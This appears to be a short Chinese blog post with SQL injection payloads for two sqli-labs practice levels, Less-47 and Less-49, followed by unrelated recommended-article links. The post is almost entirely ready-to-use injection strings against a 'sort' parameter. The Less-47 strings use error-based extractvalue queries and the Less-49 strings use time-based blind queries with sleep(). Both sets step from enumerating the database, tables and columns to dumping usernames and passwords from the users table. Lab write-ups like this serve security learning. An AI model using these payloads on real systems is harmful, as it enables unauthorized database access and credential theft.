当前位置:网站首页>SQL注入 Less47(报错注入) 和Less49(时间盲注)
SQL注入 Less47(报错注入) 和Less49(时间盲注)
2022-07-31 02:27:00 【开心星人】
Less47和Less49都用不了rand()布尔盲注
因为有单引号闭合order by 'rand()' 这条语句显然是执行不了的
Less47
?sort=1' and extractvalue(0,concat(0x7e,database()))--+
?sort=1' and extractvalue(0,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema="security")))--+
?sort=1' and extractvalue(0,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users")))--+
?sort=1' and extractvalue(0,concat(0x7e, (select group_concat(username,password) from users)))--+
Less49
?sort=1' and sleep(5)--+
?sort=1' and if(1,sleep(5),0)--+
?sort=1' and if(length(database())=8,sleep(5),0)--+
?sort=1' and if(ascii(substr(database(),1,1))=115,sleep(5),0)--+
?sort=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101,sleep(5),0)--+
?sort=1' and if(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1)='i',sleep(5),0)--+
?sort=1' and if(ascii(substr((select username from users limit 0,1),1,1))=68,sleep(5),0)--+
边栏推荐
- Brute Force/Adjacency Matrix Breadth First Directed Weighted Graph Undirected Weighted Graph
- Force buckled brush the stairs (7/30)
- The application of AI in the whole process of medical imaging equipment
- 项目开发软件目录结构规范
- PDF 拆分/合并
- STM32CUBEMX开发GD32F303(11)----ADC在DMA模式下扫描多个通道
- Verify the integer input
- 1. Non-type template parameters 2. Specialization of templates 3. Explanation of inheritance
- The comprehensive result of the case statement, do you know it?[Verilog Advanced Tutorial]
- What are the project management tools like MS Project
猜你喜欢

What level of software testing does it take to get a 9K job?

Unity界面总体介绍

The final exam first year course

Arbitrum 专访 | L2 Summer, 脱颖而出的 Arbitrum 为开发者带来了什么?

STP选举(步骤+案列)详解

Difference between CMOS and TTL?

There is a problem with the multiplayer-hlap package and the solution cannot be upgraded

ShardingJDBC使用总结

静态路由解析(最长掩码匹配原则+主备路由)

Can an inexperienced college graduate switch to software testing?my real case
随机推荐
关于 mysql8.0数据库中主键位id,使用replace插入id为0时,实际id插入后自增导致数据重复插入 的解决方法
Coldfusion file read holes (CVE - 2010-2861)
What does a software test report contain?
BAT卖不动「医疗云」:医院逃离、山头林立、行有行规
修改未正确放入沙盒造成苹果兼容性问题
[1154]如何将字符串转换为datetime
How to expose Prometheus metrics in go programs
Intel's software and hardware optimization empowers Neusoft to accelerate the arrival of the era of smart medical care
Software testing basic interface testing - getting started with Jmeter, you should pay attention to these things
Drools WorkBench的简介与使用
First acquaintance with C language -- array
Drools Rule Properties, Advanced Syntax
934. The Shortest Bridge
【shell基础】判断目录是否为空
Go 项目实战-获取多级分类下的全部商品
Live Preview | KDD2022 Doctoral Dissertation Award Champion and Runner-up Dialogue
ShardingJDBC基本介绍
1. Non-type template parameters 2. Specialization of templates 3. Explanation of inheritance
汉源高科8路HDMI综合多业务高清视频光端机8路HDMI视频+8路双向音频+8路485数据+8路E1+32路电话+4路千兆物理隔离网络
【银行系列第一期】中国人民银行